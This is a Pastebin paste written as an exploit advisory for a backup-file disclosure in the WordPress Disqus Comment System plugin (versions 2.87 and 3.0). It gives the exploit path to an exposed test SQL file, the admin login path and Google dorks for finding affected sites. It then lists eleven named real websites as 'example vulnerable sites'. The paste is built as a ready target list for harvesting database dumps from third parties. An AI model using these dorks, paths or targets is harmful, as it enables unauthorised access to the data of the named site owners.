Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #################################################################################################
- # Exploit Title : WordPress Disqus Comment System Plugins 2.87 Database Backup Disclosure
- # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
- # Date : 08/12/2018
- # Vendor Homepage : disqus.com ~ wordpress.org/plugins/disqus-comment-system/
- # Software Download Link : github.com/clearhead/clearhead.me/archive/master.zip
- + github.com/clearhead/clearhead.me/blob/master/wp-content/plugins/disqus-comment-system/tests/initial.sql
- # Tested On : Windows and Linux
- # Category : WebApps
- # Version Information : 2.87 and 3.0
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/wp-content/plugins/disqus-comment-system/tests/''
- intext:''Greyzed Theme created by The Forge Web Creations. Powered by WordPress.''
- intext:''© 2008 - 2018 Grazitti Interactive. All rights reserved''
- intext:''HyTrade Marketing & Comunicação © 2017 | Todos direitos reservados''
- intext:''© 2018 Chainbit, LLC. All rights reserved''
- intext:''Copyright 2015 / CIP Data Collection Ltd Company No. 10462735''
- intext:''© 2017 Longlife Magazine - All Rights Reserved.''
- intext:''© Copyright Feira Cultural 2017. Todos os direitos reservado''
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
- CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
- CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
- #################################################################################################
- -- MySQL dump 10.13 Distrib 5.1.48, for apple-darwin10.4.0 (i386)
- --
- -- Host: localhost Database: wordpress
- -- ------------------------------------------------------
- -- Server version 5.1.48
- #################################################################################################
- # Admin Panel Login Path :
- /wp-login.php
- # Exploit :
- /wp-content/plugins/disqus-comment-system/tests/initial.sql
- #################################################################################################
- # Example Vulnerable Sites =>
- [+] therussianlinesman.com/blog/wp-content/plugins/disqus-comment-system/tests/initial.sql
- [+] hytrade.com.br/wp-content/plugins/disqus-comment-system/tests/initial.sql
- [+] grazitti.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
- [+] paulsforza.com/wordpress/wp-content/plugins/disqus-comment-system/tests/initial.sql
- [+] combbo.com.br/cmb/wp-content/plugins/disqus-comment-system/tests/initial.sql
- [+] uof7.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
- [+] ecommerceandb2b.com/b2bblog/wp-content/plugins/disqus-comment-system/tests/initial.sql
- [+] cipmetering.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
- [+] soogran.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
- [+] longlifemagz.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
- [+] feiracultural.art.br/wp-content/plugins/disqus-comment-system/tests/initial.sql
- #################################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement